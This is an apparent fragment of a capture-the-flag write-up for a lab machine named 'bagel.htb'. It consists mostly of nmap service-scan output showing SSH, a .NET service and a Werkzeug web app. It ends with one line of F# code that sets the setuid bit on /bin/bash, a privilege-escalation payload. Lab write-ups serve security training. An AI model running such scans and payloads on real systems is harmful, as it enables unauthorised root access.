$ nmap -sC -sV -Pn 10.10.11.201 Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-20 18:56 CST Nmap scan report for 10.10.11.201 Host is up (0.093s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.8 (protocol 2.0) | ssh-hostkey: | 256 6e4e1341f2fed9e0f7275bededcc68c2 (ECDSA) |_ 256 80a7cd10e72fdb958b869b1b20652a98 (ED25519) 5000/tcp open upnp? | fingerprint-strings: | GetRequest: | HTTP/1.1 400 Bad Request | Server: Microsoft-NetCore/2.0 | Date: Mon, 20 Feb 2023 10:57:02 GMT | Connection: close | HTTPOptions: | HTTP/1.1 400 Bad Request | Server: Microsoft-NetCore/2.0 | Date: Mon, 20 Feb 2023 10:57:17 GMT | Connection: close | Help, SSLSessionReq, TLSSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | Content-Type: text/html | Server: Microsoft-NetCore/2.0 | Date: Mon, 20 Feb 2023 10:57:28 GMT | Content-Length: 52 | Connection: close | Keep-Alive: true | <h1>Bad Request (Invalid request line (parts).)</h1> | RTSPRequest: | HTTP/1.1 400 Bad Request | Content-Type: text/html | Server: Microsoft-NetCore/2.0 | Date: Mon, 20 Feb 2023 10:57:02 GMT | Content-Length: 54 | Connection: close | Keep-Alive: true |_ <h1>Bad Request (Invalid request line (version).)</h1> 8000/tcp open http-alt Werkzeug/2.2.2 Python/3.10.9 | fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 404 NOT FOUND | Server: Werkzeug/2.2.2 Python/3.10.9 | Date: Mon, 20 Feb 2023 10:57:02 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 207 | Connection: close | <!doctype html> | <html lang=en> | <title>404 Not Found</title> | <h1>Not Found</h1> | <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p> | GetRequest: | HTTP/1.1 302 FOUND | Server: Werkzeug/2.2.2 Python/3.10.9 | Date: Mon, 20 Feb 2023 10:56:57 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 263 | Location: http://bagel.htb:8000/?page=index.html | Connection: close | <!doctype html> | <html lang=en> | <title>Redirecting...</title> | <h1>Redirecting...</h1> | <p>You should be redirected automatically to the target URL: <a href="http://bagel.htb:8000/?page=index.html">http://bagel.htb:8000/?page=index.html</a>. If not, click the link. | Socks5: | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" | "http://www.w3.org/TR/html4/strict.dtd"> | <html> | <head> | <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> | <title>Error response</title> | </head> | <body> | <h1>Error response</h1> | <p>Error code: 400</p> | <p>Message: Bad request syntax (' | ').</p> | <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p> | </body> |_ </html> |_http-title: Did not follow redirect to http://bagel.htb:8000/?page=index.html |_http-server-header: Werkzeug/2.2.2 Python/3.10.9 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port5000-TCP:V=7.93%I=7%D=2/20%Time=63F351FE%P=x86_64-apple-darwin21.5. SF:0%r(GetRequest,73,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nServer:\x20Mic SF:rosoft-NetCore/2\.0\r\nDate:\x20Mon,\x2020\x20Feb\x202023\x2010:57:02\x SF:20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,E8,"HTTP/1\.1\x20 SF:400\x20Bad\x20Request\r\nContent-Type:\x20text/html\r\nServer:\x20Micro SF:soft-NetCore/2\.0\r\nDate:\x20Mon,\x2020\x20Feb\x202023\x2010:57:02\x20 SF:GMT\r\nContent-Length:\x2054\r\nConnection:\x20close\r\nKeep-Alive:\x20 SF:true\r\n\r\n<h1>Bad\x20Request\x20\(Invalid\x20request\x20line\x20\(ver SF:sion\)\.\)</h1>")%r(HTTPOptions,73,"HTTP/1\.1\x20400\x20Bad\x20Request\ SF:r\nServer:\x20Microsoft-NetCore/2\.0\r\nDate:\x20Mon,\x2020\x20Feb\x202 SF:023\x2010:57:17\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(Help,E6,"HTT SF:P/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/html\r\nServer SF::\x20Microsoft-NetCore/2\.0\r\nDate:\x20Mon,\x2020\x20Feb\x202023\x2010 SF::57:28\x20GMT\r\nContent-Length:\x2052\r\nConnection:\x20close\r\nKeep- SF:Alive:\x20true\r\n\r\n<h1>Bad\x20Request\x20\(Invalid\x20request\x20lin SF:e\x20\(parts\)\.\)</h1>")%r(SSLSessionReq,E6,"HTTP/1\.1\x20400\x20Bad\x SF:20Request\r\nContent-Type:\x20text/html\r\nServer:\x20Microsoft-NetCore SF:/2\.0\r\nDate:\x20Mon,\x2020\x20Feb\x202023\x2010:57:28\x20GMT\r\nConte SF:nt-Length:\x2052\r\nConnection:\x20close\r\nKeep-Alive:\x20true\r\n\r\n SF:<h1>Bad\x20Request\x20\(Invalid\x20request\x20line\x20\(parts\)\.\)</h1 SF:>")%r(TerminalServerCookie,E6,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCo SF:ntent-Type:\x20text/html\r\nServer:\x20Microsoft-NetCore/2\.0\r\nDate:\ SF:x20Mon,\x2020\x20Feb\x202023\x2010:57:28\x20GMT\r\nContent-Length:\x205 SF:2\r\nConnection:\x20close\r\nKeep-Alive:\x20true\r\n\r\n<h1>Bad\x20Requ SF:est\x20\(Invalid\x20request\x20line\x20\(parts\)\.\)</h1>")%r(TLSSessio SF:nReq,E6,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/ht SF:ml\r\nServer:\x20Microsoft-NetCore/2\.0\r\nDate:\x20Mon,\x2020\x20Feb\x SF:202023\x2010:57:28\x20GMT\r\nContent-Length:\x2052\r\nConnection:\x20cl SF:ose\r\nKeep-Alive:\x20true\r\n\r\n<h1>Bad\x20Request\x20\(Invalid\x20re SF:quest\x20line\x20\(parts\)\.\)</h1>"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8000-TCP:V=7.93%I=7%D=2/20%Time=63F351F9%P=x86_64-apple-darwin21.5. SF:0%r(GetRequest,1EA,"HTTP/1\.1\x20302\x20FOUND\r\nServer:\x20Werkzeug/2\ SF:.2\.2\x20Python/3\.10\.9\r\nDate:\x20Mon,\x2020\x20Feb\x202023\x2010:56 SF::57\x20GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-L SF:ength:\x20263\r\nLocation:\x20http://bagel\.htb:8000/\?page=index\.html SF:\r\nConnection:\x20close\r\n\r\n<!doctype\x20html>\n<html\x20lang=en>\n SF:<title>Redirecting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\x2 SF:0should\x20be\x20redirected\x20automatically\x20to\x20the\x20target\x20 SF:URL:\x20<a\x20href=\"http://bagel\.htb:8000/\?page=index\.html\">http:/ SF:/bagel\.htb:8000/\?page=index\.html</a>\.\x20If\x20not,\x20click\x20the SF:\x20link\.\n")%r(FourOhFourRequest,184,"HTTP/1\.1\x20404\x20NOT\x20FOUN SF:D\r\nServer:\x20Werkzeug/2\.2\.2\x20Python/3\.10\.9\r\nDate:\x20Mon,\x2 SF:020\x20Feb\x202023\x2010:57:02\x20GMT\r\nContent-Type:\x20text/html;\x2 SF:0charset=utf-8\r\nContent-Length:\x20207\r\nConnection:\x20close\r\n\r\ SF:n<!doctype\x20html>\n<html\x20lang=en>\n<title>404\x20Not\x20Found</tit SF:le>\n<h1>Not\x20Found</h1>\n<p>The\x20requested\x20URL\x20was\x20not\x2 SF:0found\x20on\x20the\x20server\.\x20If\x20you\x20entered\x20the\x20URL\x SF:20manually\x20please\x20check\x20your\x20spelling\x20and\x20try\x20agai SF:n\.</p>\n")%r(Socks5,213,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\ SF:x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\"http://www\.w SF:3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x20\x2 SF:0\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20conten SF:t=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<title> SF:Error\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<bo SF:dy>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\x20\x SF:20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x20\x2 SF:0\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20syntax\x20\('\\x05\\x SF:04\\x00\\x01\\x02\\x80\\x05\\x01\\x00\\x03'\)\.</p>\n\x20\x20\x20\x20\x SF:20\x20\x20\x20<p>Error\x20code\x20explanation:\x20HTTPStatus\.BAD_REQUE SF:ST\x20-\x20Bad\x20request\x20syntax\x20or\x20unsupported\x20method\.</p SF:>\n\x20\x20\x20\x20</body>\n</html>\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 126.81 seconds
let psi = new ProcessStartInfo("chmod", "u+s /bin/bash"); psi.UseShellExecute <- false; let process = Process.Start(psi); process.WaitForExit() |> ignore;